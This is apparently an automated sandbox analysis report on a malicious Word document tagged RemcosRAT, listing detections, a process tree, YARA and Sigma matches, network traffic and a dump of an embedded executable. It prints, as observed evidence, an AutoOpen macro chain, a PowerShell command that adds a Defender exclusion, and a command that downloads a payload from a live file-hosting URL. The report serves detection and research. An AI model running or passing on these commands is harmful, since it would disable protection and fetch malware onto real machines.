
Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID: 611840
MD5: 090e1dfdcbf2185788ea14cd113cc39f
SHA1: 6346e143368edbb5a23c8eea9698be2c266311b3
SHA256: 3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags: doc, RemcosRAT

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • msiexec.exe (PID: 2996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
    • msiexec.exe (PID: 464 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
      • icacls.exe (PID: 1436 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • expand.exe (PID: 1156 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
      • TRY.exe (PID: 2272 cmdline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)
        • cmd.exe (PID: 1136 cmdline: cmd /c thai.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • powershell.exe (PID: 1988 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 2672 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • icacls.exe (PID: 2068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  • rundll32.exe (PID: 2840 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
No configs have been found
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1
Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Author: Nils Kuhnert
Strings:
  • 0xe039:$: WindowsInstaller.Installer$
  • 0xec0b:$: CreateObject
  • 0xec36:$: InstallProduct

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Rule: Office_AutoOpen_Macro
Description: Detects a Microsoft Office file that contains the AutoOpen Macro function
Author: Florian Roth
Strings:
  • 0xe1f3:$s1: AutoOpen
  • 0xebee:$s1: AutoOpen
  • 0xd500:$s2: Macros

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1
Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Author: Nils Kuhnert
Strings:
  • 0x1039:$: WindowsInstaller.Installer$
  • 0x1f0b:$: CreateObject
  • 0x1f36:$: InstallProduct

Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1
Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Author: Nils Kuhnert
Strings:
  • 0x24a5:$: WindowsInstaller.Installer$
  • 0x23c6:$: CreateObject
  • 0x4b64:$: CreateObject
  • 0x4ce0:$: CreateObject
  • 0x4d1e:$: CreateObject
  • 0x5743:$: CreateObject
  • 0x4d54:$: InstallProduct

Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0x3648:$s1: \Common Files\Microsoft Shared\
  • 0x2111:$s2: Scripting.FileSystemObject
  • 0x2470:$a3: AutoOpen
  • 0x4b36:$a3: AutoOpen
  • 0x4d30:$a3: AutoOpen
  • 0x5766:$a3: AutoOpen


Source: Process started; Author: Bhabesh Raj; Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 1156, ProcessName: expand.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 2672, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton; Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ProcessId: 2272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 1988, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , ProcessId: 2272, ProcessName: TRY.exe
No Snort rule has matched


AV Detection

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; Virustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; ReversingLabs: Detection: 24%
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470; Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi; Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe; Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:; Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/; Avira URL Cloud: Label: malware
Source: filebin.net; Virustotal: Detection: 5%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB62E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,
Source: unknown; HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\expand.exe; File created: C:\Windows\Logs\DPX\setupact.log
Source: C:\Windows\SysWOW64\expand.exe; File created: C:\Windows\Logs\DPX\setuperr.log
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: C:\Windows\System32\msiexec.exe; File opened: z:
Source: C:\Windows\System32\msiexec.exe; File opened: x:
Source: C:\Windows\System32\msiexec.exe; File opened: v:
Source: C:\Windows\System32\msiexec.exe; File opened: t:
Source: C:\Windows\System32\msiexec.exe; File opened: r:
Source: C:\Windows\System32\msiexec.exe; File opened: p:
Source: C:\Windows\System32\msiexec.exe; File opened: n:
Source: C:\Windows\System32\msiexec.exe; File opened: l:
Source: C:\Windows\System32\msiexec.exe; File opened: j:
Source: C:\Windows\System32\msiexec.exe; File opened: h:
Source: C:\Windows\System32\msiexec.exe; File opened: f:
Source: C:\Windows\System32\msiexec.exe; File opened: b:
Source: C:\Windows\System32\msiexec.exe; File opened: y:
Source: C:\Windows\System32\msiexec.exe; File opened: w:
Source: C:\Windows\System32\msiexec.exe; File opened: u:
Source: C:\Windows\System32\msiexec.exe; File opened: s:
Source: C:\Windows\System32\msiexec.exe; File opened: q:
Source: C:\Windows\System32\msiexec.exe; File opened: o:
Source: C:\Windows\System32\msiexec.exe; File opened: m:
Source: C:\Windows\System32\msiexec.exe; File opened: k:
Source: C:\Windows\System32\msiexec.exe; File opened: i:
Source: C:\Windows\System32\msiexec.exe; File opened: g:
Source: C:\Windows\System32\msiexec.exe; File opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Windows\System32\msiexec.exe; File opened: a:
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic; DNS query: name: filebin.net
Source: global traffic; TCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: global traffic; TCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: Joe Sandbox View; ASN Name: REDPILL-LINPRORedpillLinproNO
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View; IP Address: 87.238.33.8
Source: Joe Sandbox View; IP Address: 185.47.40.36
Source: unknown; HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown; Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49174 -> 443
Source: ~DFECA159C20646BB57.TMP.2.dr; String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr; String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr; String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DFECA159C20646BB57.TMP.2.dr; String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470
Source: 535fae.ipi.2.dr; String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmp
Source: unknown; DNS traffic detected: queries for: filebin.net
Source: global traffic; HTTP traffic detected:
  GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows Installer
  Host: filebin.net
Source: global traffic; HTTP traffic detected:
  GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows Installer
  Host: situla.bitbit.net

System Summary

Source: MSI5B5A.tmp.2.dr; Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H
Source: MSI5B5A.tmp.2.dr; Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: MSI5B5A.tmp.2.dr; Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE; Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE; Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, type: DROPPED; Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPED; Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPED; Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: C:\Windows\System32\msiexec.exe; File deleted: C:\Windows\Installer\535fae.ipi
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
Source: C:\Windows\System32\msiexec.exe; File created: C:\Windows\Installer\MSI5B5A.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB63E4C
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB61C38
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB65940
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB66028
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB633C0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB61B44
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe; Code function: 9_2_000000013FB62B24
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function AutoOpen
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr; OLE, VBA macro line: Sub AutoOpen()
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr; Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI5B5A.tmp.2.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 535fae.ipi.2.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; OLE indicator, VBA macros: true
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr; OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\icacls.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe; Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe; Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe; Memory allocated: 77740000 page execute and read and write
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; Virustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc; ReversingLabs: Detection: 24%
Source: C:\Windows\System32\msiexec.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\icacls.exe; Console Write: .................................3:.....(.P.....................<...............................................................................
Source: C:\Windows\SysWOW64\icacls.exe; Console Write: .................................3:.....(.P.....................<.......................................................v.......................
